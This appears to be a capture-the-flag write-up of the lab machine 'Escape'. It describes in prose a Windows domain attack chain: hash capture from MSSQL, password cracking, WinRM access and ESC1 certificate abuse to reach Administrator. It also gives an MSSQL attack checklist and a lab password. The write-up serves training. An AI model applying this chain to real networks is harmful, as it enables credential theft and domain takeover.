Last updated
Last updated
Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.
Nmap Scan
Summary
hosts file
Kerberos Enumeration
I started my enumeration process by bruting kerberos since I need domain account to attack the box as no web server here but with no luck
SMB & RPC Enumeration
I moved then to smb and rpc services looking for misconfiguration in shared folder permissions or rpc. I found I had READ access on the Public share and no access to RPC.
I connected to the share and download a pdf file from it
After opening the file, I noticed there are credentials at the end of it.
I can access the database with these creds :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the mssql service account
Check for impersonate other users
Check for trustworthy database
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing command with xp_cmdshell
Nothing is interesting till now but I got the hash of service account using local smb server.
The hash is cracked successfully
I can also access the database with the new account.
The account don't have special permissions So I will move to winRM
Under C:\SQLServer\Logs, there is a .bak file containing logs info of MSSQL instance. What is interesting is that I find Ruan.Cooper trying to login and failed. Maybe I can use this string as a password NuclearMosquito3
And the password is correct :))
I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access
I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with name of sequel-DC-CA
Then, I looked at vulnerable template for possible Escalation paths (ESC)
The template UserAuthentication is vulnerable to ESC1 which means I can request certificate with alternative principal name (upn)
Root Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx
